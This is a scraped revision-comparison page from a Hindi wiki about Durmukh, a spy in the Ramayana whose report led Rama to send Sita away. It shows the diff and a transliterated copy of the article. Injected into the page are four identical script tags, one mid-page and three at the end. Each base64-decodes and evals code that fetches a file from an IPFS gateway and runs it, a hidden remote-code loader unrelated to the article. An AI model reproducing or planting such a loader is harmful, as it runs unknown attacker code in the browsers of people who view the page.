Difference between revisions of "दुर्मुख"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''दुर्मुख''' एक पौराणिक चरित्र का नाम है, जिसका उल्लेख '...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 +
{{बहुविकल्प|बहुविकल्पी शब्द=दुर्मुख|लेख का नाम=दुर्मुख (बहुविकल्पी)}}
 +
 
'''दुर्मुख''' एक पौराणिक चरित्र का नाम है, जिसका उल्लेख '[[रामायण]]' में हुआ है। 'रामायण' के अनुसार दुर्मुख द्वारा दी गई सूचना के आधार पर ही [[श्रीराम]] ने [[सीता]] का परित्याग कर दिया था।
 
'''दुर्मुख''' एक पौराणिक चरित्र का नाम है, जिसका उल्लेख '[[रामायण]]' में हुआ है। 'रामायण' के अनुसार दुर्मुख द्वारा दी गई सूचना के आधार पर ही [[श्रीराम]] ने [[सीता]] का परित्याग कर दिया था।
  
 
*रामायणानुसार दुर्मुख [[अयोध्या]] के राजा श्रीराम का गुप्तचर था।
 
*रामायणानुसार दुर्मुख [[अयोध्या]] के राजा श्रीराम का गुप्तचर था।
*वनवास अवधि पूर्ण कर लौट आने के पश्चात राम सुखपूर्वक राजपाट सम्भाल रहे थे। कुछ समय बाद मन्त्रियों और दुर्मुख नामक एक गुप्तचर के मुँह से राम ने जाना कि प्रजाजन सीता की पवित्रता के विषय में संदिग्ध हैं। अत: सीता और राम को लेकर अनेक बातें कहते हैं।
+
*वनवास अवधि पूर्ण कर लौट आने के पश्चात् राम सुखपूर्वक राजपाट सम्भाल रहे थे। कुछ समय बाद मन्त्रियों और दुर्मुख नामक एक गुप्तचर के मुँह से राम ने जाना कि प्रजाजन सीता की पवित्रता के विषय में संदिग्ध हैं। अत: सीता और राम को लेकर अनेक बातें कहते हैं।
 
*[[सीता]] गर्भवती थीं और उन्होंने राम से एक बार तपोवन की शोभा देखने की इच्छा प्रकट की थी।
 
*[[सीता]] गर्भवती थीं और उन्होंने राम से एक बार तपोवन की शोभा देखने की इच्छा प्रकट की थी।
 
*[[रघु वंश]] को कलंक से बचाने के लिए राम ने सीता को तपोवन की शोभा देखने के बहाने से [[लक्ष्मण]] के साथ भेजा।
 
*[[रघु वंश]] को कलंक से बचाने के लिए राम ने सीता को तपोवन की शोभा देखने के बहाने से [[लक्ष्मण]] के साथ भेजा।

Latest revision as of 07:50, 23 June 2017

chitr:Disamb2.jpg durmukh ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- durmukh (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

durmukh ek pauranik charitr ka nam hai, jisaka ullekh 'ramayan' mean hua hai. 'ramayan' ke anusar durmukh dvara di gee soochana ke adhar par hi shriram ne sita ka parityag kar diya tha.

  • ramayananusar durmukh ayodhya ke raja shriram ka guptachar tha.
  • vanavas avadhi poorn kar laut ane ke pashchath ram sukhapoorvak rajapat sambhal rahe the. kuchh samay bad mantriyoan aur durmukh namak ek guptachar ke muanh se ram ne jana ki prajajan sita ki pavitrata ke vishay mean sandigdh haian. at: sita aur ram ko lekar anek batean kahate haian.
  • sita garbhavati thian aur unhoanne ram se ek bar tapovan ki shobha dekhane ki ichchha prakat ki thi.
  • raghu vansh ko kalank se bachane ke lie ram ne sita ko tapovan ki shobha dekhane ke bahane se lakshman ke sath bheja.
  • lakshman ko alag bulakar shriram ne kaha ki vah sita ko vahian chho d aye.
  • lakshman ne tapovan mean pahuanchakar atyant udvign man se sitaji se sab kuchh kah sunaya aur unhian vahian chho dakar laut aye.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>